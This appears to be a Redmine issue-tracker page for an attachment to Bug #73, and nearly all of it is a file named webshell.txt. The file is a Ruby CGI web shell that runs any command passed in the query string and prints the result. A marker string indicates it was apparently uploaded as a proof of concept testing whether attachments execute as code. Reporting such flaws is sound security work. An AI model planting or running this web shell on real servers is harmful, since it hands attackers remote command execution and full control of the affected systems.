Project

General

Profile

Bug #73 ยป webshell.txt

Redmine Admin, 07/16/2026 08:40 AM

 
#!/usr/bin/env ruby
puts "Content-Type: text/plain\r\n\r\n"
cmd = ENV['QUERY_STRING'] || ''
puts "RCE_TEST_TXT_AS_RUBY"
puts `#{cmd}` unless cmd.empty?
    (1-1/1)